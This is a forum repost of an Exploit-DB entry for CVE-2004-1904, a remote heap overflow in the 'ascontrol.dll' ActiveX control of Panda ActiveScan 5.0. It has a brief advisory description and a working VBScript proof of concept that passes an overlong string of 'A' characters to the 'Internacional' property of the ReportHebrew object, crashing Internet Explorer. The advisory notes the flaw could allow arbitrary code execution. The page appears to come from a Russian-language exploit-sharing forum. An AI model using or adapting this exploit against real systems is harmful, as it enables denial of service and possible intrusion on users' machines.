Exploit Panda ActiveScan 5.0 - 'ascontrol.dll' Remote Heap Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
23917
Проверка EDB
  1. Пройдено
Автор
RAFEL IVGI THE-INSIDER
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2004-1904
Дата публикации
2004-04-06
Код:
source: https://www.securityfocus.com/bid/10065/info

It has been reported that Panda ActiveScan may be prone to a remote heap overflow vulnerability that may allow an attacker to cause a denial of service condition in Internet Explorer or leverage the issue to execute arbitrary code.

The issue is reported to exist in the 'ascontrol.dll' file, specifically the 'Internacional' property of the 'ReportHebrew' object is identified as vulnerable.

Panda ActiveScan 5.0 has been reported to be prone to this issue. 

<script language=vbscript>
dim mymy
Set mymy = CreateObject("ASControl.ReportHebrew.1" )

a="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
mymy.Internacional a
</script>
 
Источник
www.exploit-db.com

Похожие темы